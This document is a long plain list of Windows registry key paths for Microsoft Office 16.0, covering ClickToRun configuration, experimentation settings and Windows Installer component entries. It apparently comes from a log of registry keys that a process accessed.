HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\DevInstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\UpdateSupport\ExpiredBuild
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\E40F7BF0-08F2-40AC-938C-9EE4BF3260FF\culture\x-none.16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\E40F7BF0-08F2-40AC-938C-9EE4BF3260FF\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableExperimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\BBAutomationAudience
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\Flight\excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\FirstSessionTriggered
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\GOM\ComplexRanges
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\GOM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\CVH\VirtualProductInfo
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2476309959-3960023044-3115063449-1000\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0BC77486A266BF84FAE259379C82967F
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Products\00006109F00000000000000000F01FEC
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Features\00006109F00000000000000000F01FEC
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Features\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0BC77486A266BF84FAE259379C82967F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E40100B0F7ED50A4AABEA3DC36A2F6A6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E40100B0F7ED50A4AABEA3DC36A2F6A6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1CC1F61F05EDA1948816E2A04270A20C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1CC1F61F05EDA1948816E2A04270A20C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0136EEA3C5C1DB040BBB4272DFA05234
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0136EEA3C5C1DB040BBB4272DFA05234\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E982B78D763473478502181932C13E0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E982B78D763473478502181932C13E0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E29400AB2B7AA47439822EDB9310C437
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E29400AB2B7AA47439822EDB9310C437\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91911CC5AA25BA64ABAAA692E02F2D30
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91911CC5AA25BA64ABAAA692E02F2D30\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8DF4AEBDD158AE438C8F2F6D20AD7AC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8DF4AEBDD158AE438C8F2F6D20AD7AC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5F07DEC661BF284EA6075DA5F525BAA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5F07DEC661BF284EA6075DA5F525BAA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E6D33DF58B7A854083E8402A99D91B9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E6D33DF58B7A854083E8402A99D91B9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D692E8379026B8448157BD6D7916F3E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D692E8379026B8448157BD6D7916F3E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39852B3E9E8B1EB48AE06D034A14262D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39852B3E9E8B1EB48AE06D034A14262D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49A2B0FF5E149204B8A8FF1E28D32963
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49A2B0FF5E149204B8A8FF1E28D32963\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01B4EDCF03C143E4793454CC8B37A96D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01B4EDCF03C143E4793454CC8B37A96D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2921D0D2052C0124CA0823230A7CF03C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2921D0D2052C0124CA0823230A7CF03C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A31077A24A584C4984DC332F0E08910
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A31077A24A584C4984DC332F0E08910\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A0E44963B01D7B149B193F9533340C35
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A0E44963B01D7B149B193F9533340C35\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\203B9BEF0241105418918A660830D016
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\203B9BEF0241105418918A660830D016\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5DD98A0D7B791B84993A4B734D9CB013
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5DD98A0D7B791B84993A4B734D9CB013\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE6518C60D100DC4D8531B45F3D892C7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE6518C60D100DC4D8531B45F3D892C7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7016BA370EA4E9E419714B97BAC401E8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7016BA370EA4E9E419714B97BAC401E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46CC12D7C7A12C24B8D82AD7D20C00A5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46CC12D7C7A12C24B8D82AD7D20C00A5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\536F52269804BFE4CA6C3B9825FC4C94
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\536F52269804BFE4CA6C3B9825FC4C94\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF78260F2BE7BC8408640B1261F73B2D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF78260F2BE7BC8408640B1261F73B2D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01313DC250A655A4BA615BB9AABF7378
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01313DC250A655A4BA615BB9AABF7378\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D16D1323CC1A074FA09BBF442DE9028
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D16D1323CC1A074FA09BBF442DE9028\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2A8F3F35080EE3E48A4E69A1726B20C9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2A8F3F35080EE3E48A4E69A1726B20C9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\115682E35C354A747AB19A8B37511A7E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\115682E35C354A747AB19A8B37511A7E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\648465DF56EA66345BB2567B0F873BE7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\648465DF56EA66345BB2567B0F873BE7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E1C7A107880935E48BF2271B25500A01
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E1C7A107880935E48BF2271B25500A01\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\123A732343FF9B945BE4CB85C922D77E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\123A732343FF9B945BE4CB85C922D77E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1D54092CA66F47143BC7720DEE6C1520
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1D54092CA66F47143BC7720DEE6C1520\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8741F187B4431884F851C69EE93CCC80
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8741F187B4431884F851C69EE93CCC80\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE4121E3A9B6A8046B31DD1157F16447
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE4121E3A9B6A8046B31DD1157F16447\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\646E3426DE12AD448ACF14D7B83A7E16
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\646E3426DE12AD448ACF14D7B83A7E16\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38B4816825059EF5ABEFE7AC69DC237A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38B4816825059EF5ABEFE7AC69DC237A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\854320E5CD315974BB230446F54F012B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\854320E5CD315974BB230446F54F012B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46FF8D92C641ED4469A6364C3DF80F53
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46FF8D92C641ED4469A6364C3DF80F53\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\86FDD2C8637365C489BEB6DC30E9FBB7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\86FDD2C8637365C489BEB6DC30E9FBB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BCF244F508B5E84D97CE5B20ED48AC1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BCF244F508B5E84D97CE5B20ED48AC1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304137362B940964CB6A957A63031F9B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304137362B940964CB6A957A63031F9B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2804C1692E9F684CACC9E114F49C8BB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2804C1692E9F684CACC9E114F49C8BB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C80E91F77D2396F49A9B971548BEFEC8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C80E91F77D2396F49A9B971548BEFEC8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4608B75C85EB92E4B9C78C18C52F177B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4608B75C85EB92E4B9C78C18C52F177B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E7133CE0DB89F148818C6E45D79BFDC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E7133CE0DB89F148818C6E45D79BFDC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56CDF88E115A2914F94BA591E8FE427E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56CDF88E115A2914F94BA591E8FE427E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2C67F53B44B8E44CA78D31E45C0AEC9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2C67F53B44B8E44CA78D31E45C0AEC9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\90ACD79B4EF140F4281AC4059348577F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\90ACD79B4EF140F4281AC4059348577F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\740F27CC073749E4E96E7B55BE37D49A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\740F27CC073749E4E96E7B55BE37D49A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEDAB3D6E7F6C2C4684D92A5E897BC1C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEDAB3D6E7F6C2C4684D92A5E897BC1C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B12F5455BBA80C849A3154420AB8F9F6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B12F5455BBA80C849A3154420AB8F9F6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78C18AA6E7771834FB7DE38FC605A037
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78C18AA6E7771834FB7DE38FC605A037\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E48DA50A37CFB4541808027C61577613
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E48DA50A37CFB4541808027C61577613\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\11ABDF44143022045A74807F2199D297
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\11ABDF44143022045A74807F2199D297\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3054A48C6DA69514F8A11C66A1FE4D43
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3054A48C6DA69514F8A11C66A1FE4D43\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01211C777013DA94EA165EB6354C7BB3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01211C777013DA94EA165EB6354C7BB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5D24E6113CF0F848ABE77515177DCB5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5D24E6113CF0F848ABE77515177DCB5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F87D976C4168904EA01C6B79C7D3357
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F87D976C4168904EA01C6B79C7D3357\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3422A1FF37E556F48874D71DA1A7FCBC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3422A1FF37E556F48874D71DA1A7FCBC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9878932B862896C45B61278195E274B1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9878932B862896C45B61278195E274B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05FF053B717129E4C97F9560D8E3C885
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05FF053B717129E4C97F9560D8E3C885\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4DD2033E784F9BE46B16A770B3DE0173
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4DD2033E784F9BE46B16A770B3DE0173\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2CD56AAE28348674E9675C463C6021D2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2CD56AAE28348674E9675C463C6021D2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\677C6A4AF7669584890696422D933362
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\677C6A4AF7669584890696422D933362\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BE632C1D2D584A14BB4583F6D3E91962
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BE632C1D2D584A14BB4583F6D3E91962\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\50AD92533E1A17F4398E08E3C40D8611
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\50AD92533E1A17F4398E08E3C40D8611\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD5CBA1C4F15D0A4495AFAF4ECA7D2F0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD5CBA1C4F15D0A4495AFAF4ECA7D2F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\82FE3EC09B47F3A4A9C7014EBD86BC95
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\82FE3EC09B47F3A4A9C7014EBD86BC95\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7CA503EFF8D2D6843935591226A56DB7
